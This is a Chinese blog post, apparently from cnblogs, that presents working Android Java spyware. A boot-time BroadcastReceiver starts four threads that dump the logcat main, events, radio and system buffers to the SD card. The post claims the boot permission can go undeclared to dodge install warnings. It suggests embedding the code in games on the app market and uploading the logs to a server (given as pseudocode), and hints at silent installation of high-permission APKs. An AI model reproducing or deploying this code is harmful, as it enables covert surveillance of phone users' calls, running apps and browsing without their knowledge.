抛砖引玉 之 谁动了我的隐私(android用户隐私窥探)

用户的隐私永远是第一位的，用户的隐私也是最值钱的。

最近各大门户相继被泄露。。。保管好自己的密码就行了

这里我就扯一下android下面搞用户隐私的方法，也算是android的一个疏忽。

但最主要的，还是用户在安装apk时对权限警告的无视，就犹如我们所有社区的密码设为相同一样。

罪魁祸首就是logcat。以及一个权限检测的bug.

1、开机启动

　　程序如何开机启动？那就是接受一个关于开机的广播，具体流程是这样的，首先在 清单文件 声明一个权限 　　

<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

　　然后就是写receiver以及在清单中设置了。

<receiver android:name ="org.igeek.hack.reciver.HackReceiver">
<intent-filter android:priority ="1000">
<action android:name ="android.intent.action.BOOT_COMPLETED"/>
</intent-filter >
</receiver >

　　

public class HackReceiver extends BroadcastReceiver {

@Override
public void onReceive(Context context, Intent intent) {
................
}
}

　　其实呢，完全可以不必声明权限，照样使用。

　　android的包管理器在检测到用户要安装apk时，只是扫描一下清单中的权限声明，然后列出权限警告给用户，上面根本没有声明这个权限，所以不会列出来，但不影响使用，这个bug一直坚守到了4.0.

2、窥探隐私

　　我们要记录用户的一切，从开机开始！

　　安卓的一些调试工具，是默认集成在rom中的，比如logcat，不止是sdk中携带，而是每部安卓手机以及平板都有的。

　　而且，安卓框架会向log缓冲区写入所有的Log，具体是这几类：main、events、radio、system。这些Log缓冲区基本上涵盖了手机运行的方方面面。

　　进入正题，我们会用到Process类，也就是进程类，dalvik会分裂出一个进程来执行其它本地程序，就像在shell中打入命令，shell分裂一个进程来运行它一样，我们只需要把shell下的命令写成字符串，直接扔给process即可。

别忘了再加入这两个权限

<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>

//简单的示例，这些代码可以附加到某个market的应用里，比如游戏等等
//其实有些广告的sdk，需要一大堆权限，好多都需要开机启动
//我想，可能是收集用户信息来分析用户的行为，来进行定点投放广告吧
public class HackReceiver extends BroadcastReceiver {

@Override
public void onReceive(Context context, Intent intent) {

///main
Runnable r1=new Runnable() {

@Override
public void run() {
writeLog("org.igeek.hack.main.log", "main");
}
};
///events
Runnable r2=new Runnable() {

@Override
public void run() {
writeLog("org.igeek.hack.events.log", "events");
}
};
///radio
Runnable r3=new Runnable() {

@Override
public void run() {
writeLog("org.igeek.hack.radio.log", "radio");
}
};
///system
Runnable r4=new Runnable() {

@Override
public void run() {
writeLog("org.igeek.hack.system.log", "system");
}
};

Thread t1=new Thread(r1);
Thread t2=new Thread(r2);
Thread t3=new Thread(r3);
Thread t4=new Thread(r4);

t1.start();
t2.start();
t3.start();
t4.start();
}

//你懂得
private void writeLog(String file,String content){
try {
StringBuilder command = new  StringBuilder("logcat" );

File devFile = new  File( Environment.getExternalStorageDirectory(),file );
if (devFile.createNewFile()){
command.append(" -b " ).append(content);

//命令格式是： logcat -b main
//logcat -b radio 等等
Process process = Runtime.getRuntime().exec(command.toString());

//这里，将本地程序的标准输出，也就是std::out转成java的输入流
InputStream input =  process.getInputStream();
BufferedReader reader  =  new  BufferedReader( new  InputStreamReader(input));

//再把转入的输入流搞成输出流，这里放到sd卡的目录里面
FileOutputStream output=new FileOutputStream(devFile);
BufferedOutputStream bot=new BufferedOutputStream(output);

Log.e("hack", "记录LOG -> "+"sd:"+file);
String log;
while((log = reader.readLine()) != null){

//其实在输入流获取后，可以根据规则摘取想要的信息
//没有必要通吃

//在关机前，这个循环是很难跳出的
bot.write(log.getBytes());

//这里呢，可以学学骑驴250，将获取的数据上传到服务器
/*
伪代码

在清单中添加个Internet权限，相信用户也不会多心的

go:连接服务器
go:压缩并上传数据

*/
}
bot.close();
output.close();
reader.close();
input.close();

//亲手测试一下，你会惊讶的发现，谁给你打电话、你当前运行什么程序、
//你看什么不该看的网页，都一一记录在案

}
} catch (IOException e) {
//have a nice day
e.printStackTrace();
}
}

}

就说这么多，感兴趣的可以研究研究market的安装方法，以及market uri，可以做到0权限静默安装高权限apk。

最后，请关注我的 抛砖引玉 系列，会有更多精彩内容

原创，转载请注明 http://hangxin1940.cnblogs.com
这里仅当抛砖引玉，本人水平有限，难免有些疏漏或者错误，还请指正！！！